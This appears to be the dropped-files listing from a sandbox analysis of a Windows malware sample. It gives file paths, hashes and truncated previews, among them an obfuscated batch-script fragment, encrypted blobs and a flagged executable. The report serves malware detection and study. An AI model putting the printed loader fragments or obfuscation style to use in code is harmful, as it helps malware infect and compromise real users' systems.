Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".7.t.s.w.N.F.p.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.g.a.N.o.8.r.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.3964635261879135
Encrypted:	false
SSDEEP:	96:6NnCiHCVNnCcbCaNnCc9CfNnCddgEC5NnCfkCfFNnCvaLDCv6NnCAwCCNnC163CT:6N6NbNSNueNiNKaLG6Nx0N6
MD5:	CF1784D8F15F7E65D726D68EC505875E
SHA1:	BFBF3B149E833B4439AD1D58F5877007F494D3E2
SHA-256:	0BAF9461894A370E7D27644BAC480075AD931D44BBD9BD4AAEF7CF3D6B3D69BD
SHA-512:	8EE647D82BFD99B3FB258016FEE346CCEF82090A0A87A62A0067EC0BAF1901C2C797F301BFB22132592ED43BCB2B90A5BA3C3CB37F9DC4BF5BA92BE8CB5F1A25
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C6DDBFD3817B84BD7FF9A73D80B772D5",.. "id": "C6DDBFD3817B84BD7FF9A73D80B772D5",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C6DDBFD3817B84BD7FF9A73D80B772D5"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/29F5B596A1066BE439B912437A119AEB",.. "id": "29F5B596A1066BE439B912437A119AEB",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/29F5B596A1066BE439B912437A119AEB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1267
Entropy (8bit):	5.368899287319575
Encrypted:	false
SSDEEP:	24:OBfNaoCFR3e5R38INePKllDCFR3oBfNaoCCRwEuAwEKBYpDCCRwBBfNaoCiHma1u:SfNaoCFR0RsTECFRofNaoCCJCCcfNaoM
MD5:	E87396990E2423F93922D92C71893714
SHA1:	7517C2CFAE6EC1D3CD229381CE7CBB6C5FC9574A
SHA-256:	1E582E13E73FE88D4115201577DD70E4C4FA0DDA06B79EB05D9F2EE4181ACE4D
SHA-512:	33C4A0569EEBF639BC8230B348D3BB376DC4BD88851852B3E8B336E54E58A105A8D8530CAE35F1798676DF4EBBC9D7B93838CDBC4A01533B19C6E18D57D6DF76
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5C018C1C24449906F2E7BEA775079721",.. "id": "5C018C1C24449906F2E7BEA775079721",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5C018C1C24449906F2E7BEA775079721"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/21F50AB8B9AB24F84B4F3711D6A206B2",.. "id": "21F50AB8B9AB24F84B4F3711D6A206B2",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/21F50AB8B9AB24F84B4F3711D6A206B2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Temp\1f32f226-2916-4ed7-9768-c8c302de3856.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	71991
Entropy (8bit):	7.962059490225542
Encrypted:	false
SSDEEP:	1536:sz/M7tHLutxdmN+SazfuNajYmMqAebSysHcmLyqxgErB+bHBL+I:sz/M7tHm4+7f/Yb1tLbeqrUbHt+I
MD5:	F6D73E65A1180CCDE9447AF3BA3556FC
SHA1:	C44C0493C64D457171339BEEE1EDB60BCDD84EB1
SHA-256:	938E9FE3CFD32CB8299ED5052945E3C493C742CB9B326EFE8B7C6CC1F879E751
SHA-512:	750E658FADFD1637F928B8F9FC0570D180B6616D9B83619FFF0A3EB442EDFDB22E14720A620A87416B81FC64E2770A8B0C052B57EA397D9E64B10524A670A2C0
Malicious:	false
Preview:	.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A...v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~...DZ..Q.[L..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./......LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0r`..aP.r..3.8)A..AR.....S$y.{.\....!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G.....\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......

C:\Users\user\AppData\Local\Temp\2e782b36-4c0f-40ad-a81e-e541041913aa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 'Setup.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: 69633f.msi, Detection: malicious, Browse Filename: fm2r286nqT.exe, Detection: malicious, Browse Filename: nB52P46OJD.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: SET_UP.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\415434\o

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	280818
Entropy (8bit):	7.999456751048454
Encrypted:	true
SSDEEP:	6144:umy7nnIOL6AjZHZK/I+8E9cuoPpGLepsauhCK1HnycLJSq:uh7jL6IHGCELohGSpjK1Sc1V
MD5:	3A313E5A0D3931A81BA6F11BA1961032
SHA1:	D003BDAC65DBB1EC98C27532AC6549359E5F4A4F
SHA-256:	5C7705AA7B8B5B9C4F2C0893B6D861A93DC65BA4AE4346CA635990690DC3EEDF
SHA-512:	4031F7E955DB9185D1B6FCD8D6CB118E1653C910255CF68E93FD151E70016CEE6D2DDB57C375B63325773DC794734E1EFA8FC445CF878D85D0ABF5FAB308F9F5
Malicious:	false
Preview:	...k,R...z....>k........I.=.tz..e.>....L.)$..u.xi&..w.....!.....FH,. ..(RK..Q.......$."....e`F.t...,.rId..%...&.....H.X&....o..D0.E1....U.m.....l;.y.Ee..f....C.Mr.+W....Y...<...[......."...}.W.t.s....4..z*..H..8r..^....4..(%]F.......h..%8.g..I...P\....E0p.txM2.+X_6{\f..M.v`$p&v.....0...7....5H..xb..-+a........Wx.4']:.$....VA.z.........z.+....D..t.D>.......?..V..U..iXy...Y.]...t..@.b3.....: .........p.~.......Z...Bw!.P.^]..^St.."{..Ev@^]...d...;.pv..fR.l.lwg..:.?..........u...O..:`TvV.3.F.....?)~..n\.....s..'N...?.F.P..&....(..b...K.....RV.=V..v.eU.6p..J..V....H...h. Ff..O.<....!..m.J$`gQ....-I.TJe.....1......8.b..Dp......"zwQQ.g..:..D.Mb.....qc....O4......."..S.....Ak.....-.....r.q...w....Q........0.....X/.+).>x..0...5y.2....m.U.....! ..p.A..$.\|P6m.x...p..f.......GM.....t.8.8H....P......k@.vW...5..qw....[.NZ..5....K-N.. MS..+.;k..3u}f.(:....".AU.7....V...E/........J.#..$.+>.D..P..cm.&.F..te."..>.s.P^...dGqx.......#...S..5es..

C:\Users\user\AppData\Local\Temp\4300fd2f-5073-4b9c-b7b6-c35690cf7a67.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\Adjacent

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	ASCII text, with very long lines (671), with CRLF line terminators
Category:	dropped
Size (bytes):	15855
Entropy (8bit):	5.153154784733045
Encrypted:	false
SSDEEP:	384:mrAOLF31KE6ElpjuHG1OkyiAnnuOCxjKp6zjHVGvvcawQJR:YbFFXDpjINwqb8XVGvvcawQJR
MD5:	3DC92B0A897B53F1F718CC04DDB09AE5
SHA1:	02C727A56B28A44BF033DF4A53289AFF9FFDC4EE
SHA-256:	6F1E5610EBAAADC65FB9A34EDCD979FA34AC2C1CC4B8DFD1B62DEE054C4697D1
SHA-512:	29DD812744265A34F558C01A5A5B17B13DCC260AB8FE7DCBEB4548BFD2C6A441D7DDACCF01CBA0BCA6D68A0F137CA8A5D5740A8006B45FBEDC9DF313817E84CD
Malicious:	false
Preview:	Set Configuration=g..RZlCollapse-Smilies-Recognize-Cnn-..jITwo-Expansion-Debut-Shops-Occasional-Horizontal-Part-Politicians-Corp-..XJAb-Hotmail-Eternal-Vcr-Cst-Mexico-Plaza-Leaves-Milwaukee-..KQvhCalgary-Lb-Titans-Based-Revenue-Content-..xXRAffected-Framed-Pipeline-Documentcreatetextnode-Millennium-Analyses-..zpxCu-Annually-Possibly-Yields-..aDBCommander-..Set Hewlett=M..aBScience-Devel-Seemed-Colin-Breeding-Lighter-..XrPickup-Agency-Rt-Canvas-Mistake-Shake-Principal-Switzerland-..hCSen-..sGFan-Jackson-..cWIProtocol-Strategy-Bibliographic-Confirmation-Secured-Zimbabwe-Flag-Acquired-..JdmHChile-Adventures-Two-Charter-Dee-Devices-Antonio-Relocation-Injured-..RmaJuvenile-Payroll-Italia-Regulation-Following-Transit-Hose-..LAtuMai-Editions-Bucks-Achieving-Speakers-Wants-Desusertions-Column-Instant-..Set Recognize=l..ryInfection-Eclipse-Slovenia-Monster-Difficulty-..KzvPipes-Gives-Klein-..nIwIFreeware-Lawn-Sex-Rain-Rv-Queens-Treo-..jhFundamental-Marine-Existing-..lgHRDel-Now-..BTRemoval-Ht-A

C:\Users\user\AppData\Local\Temp\Adjacent.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (671), with CRLF line terminators
Category:	dropped
Size (bytes):	15855
Entropy (8bit):	5.153154784733045
Encrypted:	false
SSDEEP:	384:mrAOLF31KE6ElpjuHG1OkyiAnnuOCxjKp6zjHVGvvcawQJR:YbFFXDpjINwqb8XVGvvcawQJR
MD5:	3DC92B0A897B53F1F718CC04DDB09AE5
SHA1:	02C727A56B28A44BF033DF4A53289AFF9FFDC4EE
SHA-256:	6F1E5610EBAAADC65FB9A34EDCD979FA34AC2C1CC4B8DFD1B62DEE054C4697D1
SHA-512:	29DD812744265A34F558C01A5A5B17B13DCC260AB8FE7DCBEB4548BFD2C6A441D7DDACCF01CBA0BCA6D68A0F137CA8A5D5740A8006B45FBEDC9DF313817E84CD
Malicious:	false
Preview:	Set Configuration=g..RZlCollapse-Smilies-Recognize-Cnn-..jITwo-Expansion-Debut-Shops-Occasional-Horizontal-Part-Politicians-Corp-..XJAb-Hotmail-Eternal-Vcr-Cst-Mexico-Plaza-Leaves-Milwaukee-..KQvhCalgary-Lb-Titans-Based-Revenue-Content-..xXRAffected-Framed-Pipeline-Documentcreatetextnode-Millennium-Analyses-..zpxCu-Annually-Possibly-Yields-..aDBCommander-..Set Hewlett=M..aBScience-Devel-Seemed-Colin-Breeding-Lighter-..XrPickup-Agency-Rt-Canvas-Mistake-Shake-Principal-Switzerland-..hCSen-..sGFan-Jackson-..cWIProtocol-Strategy-Bibliographic-Confirmation-Secured-Zimbabwe-Flag-Acquired-..JdmHChile-Adventures-Two-Charter-Dee-Devices-Antonio-Relocation-Injured-..RmaJuvenile-Payroll-Italia-Regulation-Following-Transit-Hose-..LAtuMai-Editions-Bucks-Achieving-Speakers-Wants-Desusertions-Column-Instant-..Set Recognize=l..ryInfection-Eclipse-Slovenia-Monster-Difficulty-..KzvPipes-Gives-Klein-..nIwIFreeware-Lawn-Sex-Rain-Rv-Queens-Treo-..jhFundamental-Marine-Existing-..lgHRDel-Now-..BTRemoval-Ht-A

C:\Users\user\AppData\Local\Temp\Albert

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	6.6858607495034255
Encrypted:	false
SSDEEP:	1536:uUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY45:lWf05mjccBiqXvpgY
MD5:	0F3DE5157FF9571317658B129E37C81B
SHA1:	E0DE9B46E26DA3C88E50C21CC9C5C0E3934F9C3C
SHA-256:	A08EFE794355F41F2DD094A94405AAF80FED006A87463F934D28F35BF2BD96DF
SHA-512:	CF51A740213D909477910AAF609D6C8671A64CA2CA084831B858BF2900771F21B85DFFAAC13039FB90C0B711B84591C494AF7EBE279EECD13CB4B5C329E04BC9
Malicious:	false
Preview:	.....@[..x.t.2._^.....;w.r...U..QSVW.}.3..M.97t?.Ad.E...t5.A`.......t#..............W.3....I...t.3.@...M.F;u.r.3._^[....U.......SVW.}.3...E.E.............>ERCP.......F....w.....F$..N&.....F"...F....N.E........F............N0.M...u..E.3.Pj........M............<.....@...........D.....@...j ..H....E.j.P.<...M...<.......U.P.F.......P./...YY3.A;........M..E..M..Qj..v...P........E...................9].u...~JjL.......Y.........s 3.A.s.3....F...,....~.j 9}.u0WP..;...E......~..N...F(.._^[..!]......l....C....N..M.QP.&....~(..U...,.E.SVW....M.%.....}.}..r..E.j.X......e..3.E.]..A.......................f;.t....f;.t......f;.t.....K...C.]............................A..$.{.A.C....]..}..t.f.F......f#......f;.u..}...........}.jwXf;........._^[...u..}....u..M..u.W..........x...jw.].[..F..4Ff9.t.].....X.....F.j.Zf;.t:j.Zf;.t2....1L..4F.5.....pt#j.X.4F...............C.].............F.....A...E.=.A.z.A.+.E.w.A...A...E...E.).A...E.=.E...E.L.A.R.E.w.E...E...E...A.O.E...E...E.5.E...E.....

C:\Users\user\AppData\Local\Temp\Arabic

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	2302
Entropy (8bit):	5.242282736069647
Encrypted:	false
SSDEEP:	48:h9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcE:LSEA5O5W+MfH5S1CqlVJcE
MD5:	8A5D92E99E9061975DB86E103003537D
SHA1:	EE58ED18540A398E5A87BD40CED077ED82D95B04
SHA-256:	2282AB2492F8A81C9E6063CC97E2745A74338A94581D711A22CD8E453C82C724
SHA-512:	B30BC2F9C5B1DA401F50F25B2330D0C9482AC4AEE223CACD30E27609CB9B7DE0C8AB88ABC941A2BE87E7FE5497DD2C6809C9CE651F362741BA7CDA1D3476CCCA
Malicious:	false
Preview:	Analyze........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cellular

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	72545
Entropy (8bit):	7.092270828618897
Encrypted:	false
SSDEEP:	1536:qWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:qWy4ZNoGmROL7F1G7ho2kOb
MD5:	549F8FDD4D1C4516C48F11445AADCB6E
SHA1:	10FE0F7335139CA423CE1FCF74D7D1309E2D6E03
SHA-256:	401473B1A8CA70D03E18D018B69838C7A7DDA0D2E726640E56D41A6EFA4578AA
SHA-512:	A10CE1A53D052648241DDD34424E3669A25A48950A78F1C45D30C1D57F1BB7F58D6E4D98F465324B3A33659FE308450EF7231D86D6C297DEEBB0EB23CB66168F
Malicious:	false
Preview:	&...;l.._D.W..F.NU(...>...s\..]...HDZ..spg..]1...FN#0...`.......=.x..r...../.......W'........,..<.t..P.};..7.b.'A...3.3...?.................K....y^.6.....WK.......!..`.`.....A...3..oU....8.0.P.....["..op!....3..2.B~.R..2....L.c!.....H'...F..L....q......r....?."...m$bR.r...."/....d.r......,.......h/{.....F..(0...&"_.....'.\|>...V.....F2.b.br..k.fx..,kEo.T3 ..qh(.#{.........T......y>..ml[.XXX..\|......(.T.?.[.{.gy...SK.X^...`.B&...`.c.3t&..x......J..?S.Te.....J.R..U..."?D...+6....uf..7.)U<.of.L.}.).9.G.:.H-..~.....D"Q.6....M....:.a....e...[.\|.......w............at0E.5.(...<.......b.G.]q.+..i...H.XX..s...2.Ba.K.m!.cs...d6....{I......f.."...-..d....).c......L/....qib.!.v<<..n...=....!.Sa...-(.....8.H..,....6..ID.....X+.9ue...N21..Y.6Bw{....<.............a..X.1.q..ovv......`...u.r.&_z.g...S.+\|..-....,..B.WD..Gggg.-E.'O...._U...r.).5....v.o.1Nn..Y.6Ea..w.N...v...e,...C..s~....'..$......~...E....le\|..7.q....W....~.}..<}.....*D...YU.?...X.{..\|>n..O...i......

C:\Users\user\AppData\Local\Temp\Change

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997243222838243
Encrypted:	true
SSDEEP:	1536:+vQ/dBHRgcQNrZWpQ809dCvJmF/mC/CTR3wmPJVpCK3EyhuE1kC:+oLHeLNsa/m4+RJZCyEA11p
MD5:	602733C5597DEE2F3DFAF0B9D9F162BA
SHA1:	F1FED367DB466813440968510F0FFA77B188843C
SHA-256:	52F2163C4D9365B2115469A1BA8AFC077DC727D4FE9B7F4E236A33033E2E4BFC
SHA-512:	571AD4F939A7F5F7D918A2F55314D18294EA4E0FBBC913AE54800C19AFD411B29FCECBD20E9F09288A5FD1C9BFF6C81F348F3946E684D87F17FDF0A2F19C4AC4
Malicious:	false
Preview:	w!..!...U..S.[Jn....u.~(x....4..>.z.m....$...iA....).o.....X%...P...Id^~.5e..1....E....G6.p,.@5.h...`Q..S.`F.=..x....=Kh...Mp.g....Zt..Pu.. .....G.`.g...H.!.....A..5.....z........].h..m/.wv~y........6...IC...B.'...z.....q..\z.S....1)......7.6."!>..O.....o.#.t[},X..A.3.G....a>o1On.17....+.n\|.../...Ak....<..@Z.d..%%6.a.N[...;.pKi.z\..(.Z9S..P.~.E..8.$....*$7C.!OhRK[r..\|...P%."....+8..+...n..!..}:..U........J.I0...RL.m...s.......@.t~+%...Vx....E@...O.#Oc4.7..j.E.....2}.5 $.`x... ....wg.h@...<.EH....VE.=..Q(y.?#...c.x...o......^:.?o..Br...#..........MA].=..N,.......>..Q......w!.[..`....../.q.-.Q.).I.c.ho.........{...~...=.........&....Q<..R.s..!b.5n.'}.W.D.l.\|.....<2"o.........[.....c..G.%......s.6.C.h:=.g.`.....1...D.:.).X......q.........6.p.3.-.Y.z,;.a.....@..pDBl.8@G........^...{........@b..Fm..].pD...L]..o..I.a1..6+.......4f].....!.....2.k..).M..tO.....+...e.........8...vS+tj.z0.!x%.vfU.....B....G@Q....:x.v.>=f.W."......s.L.....O}dp.2../..B

C:\Users\user\AppData\Local\Temp\Checked

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	50418
Entropy (8bit):	7.996242040627988
Encrypted:	true
SSDEEP:	1536:VTnDTz2lyiERkYWuH2dmZSko8+7aTyqjta6Kpo5:pnDP2lyiQWpkSkYQa6L
MD5:	E778F8484A37B636A2208CEEC6CDFDC4
SHA1:	3A9F6AB2CF95D8A22B7CD4A7540C853A4741EEA9
SHA-256:	6C29432EAD9765778215D6A0DD979B19B2E388631A8C962F44B18E9A00F13FBB
SHA-512:	2C8365606C7744B02EB332F6FC115BC40EFC6EB22600A798D922D40B61B7E9371216AEF54E2CCDC918C49C1FEB5348991B972AE493B8B9E67E217F5E0D2E791D
Malicious:	false
Preview:	i..Y};.f..O^W...V./x"..N.....\|IY..-.h.:..9;...v.$..B.b.JNN.....T...T..SSP.a..........n.U...I..@.......).'...q_...C.......y......v..e.....F....4.d.#.Dt....q.$J\|.oc.P..m.C.\|k..#....Fs..$.D~.J.).......O.l"4..oS..z.C....S[....vd..Gr......m..uN.Y$.a2.A.... ..u..R^z.Sz.g....,G........."Q..(.U G..{._}S..."..P..ujwV...e..9p..7a?.x.s..l8....l2.Rp.....j..(Yl.....x.5..K. (b.'.#a.)}-...T..t..G..L.......[H....z_>0X......B.<.f.A.z..c.:&...).....=[...`...Z.8j..2.>..@...:..I.c...L..].'e.0..dx.I............u.3...s.:....]..Y.........+J4../......y.'....~.m.o.K..W...HD..'.3....Eq..z...$dX.2..0._.u..N0.N9.....ZKib}.............3w&.f....,.4..1.DT.'...STw......:xyg...b.....2....\y..]...m...4T.:PK.^....>.A...=.l m...j..'.M..lB..0...7.U.(0!.{.y.x.A..$%..T..>.S.p..[..u#....C@.o..H.42&.Is.A....i..z.'..GLA...g..C.:.Pj..H.%8k........I...6..6..... ~...%!.@.b..........Y.4Lu0\|....8D..3...Z..tn?....d.30...t!..Mu..A.O6...........4Y.1*B.gs.$...s.4..q..s..:..TCHC...

C:\Users\user\AppData\Local\Temp\Cylinder

Download File

Process:	C:\Users\user\Desktop\QIo3SytSZA.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	5.337057055403027
Encrypted:	false
SSDEEP:	1536:K2j62SfuVGHj1vtK7h6R8anHsWccd0vtmk:K2jfTq8QLeAk
MD5:	BAE4DEFE22A7096BA4E91B88AD79342A
SHA1:	932C690A819838BD023419105CD8451184DD2577
SHA-256:	02EBA91D5C2D4B6ADF445D8BACA3BA98C13ECD6BF72509FC594D97A886AF1E11
SHA-512:	BBE6A472FC030F7B6D04B91626B8830F6AB5C2A74E39AC265DF8E13D0514A00AD76290EE83EB717AB7DD6D6B5937C205C92FABC64666235329987F0986CB6EF4
Malicious:	false
Preview:	...........jw.}._..F..4Ff9>t.}.....E..y...E...;.......jwYf;...........h....}....^....]...N.jw_.C...H....A...Af99t.}.;.v.;...9....M.....t.9P.t.....u..........E.M.PS.u..U..J..U....................}..P...jw_..F..4Ff9>t..9.....F.....1L...4N.........1L..4F....G....}...}.......f.F......f#......f;................F..........F.....F..}....t....uL....G...G.}....pu...F...j.X.4F.......br+..gv4..iv...lv..mu...F.f;F.u....}.........G.....j...j........j.X_^[.....I..I.\.I...I.Y.I...I...I.2.I.=.I.b.I.F.I..I..I..I...I...................................................................................................................................................................U..QQ...SVW..f........j.^......u..E.....f..u......f..pu...A...A.o...;...............Ur..Zvg..]v...`v]..au...A.f;E.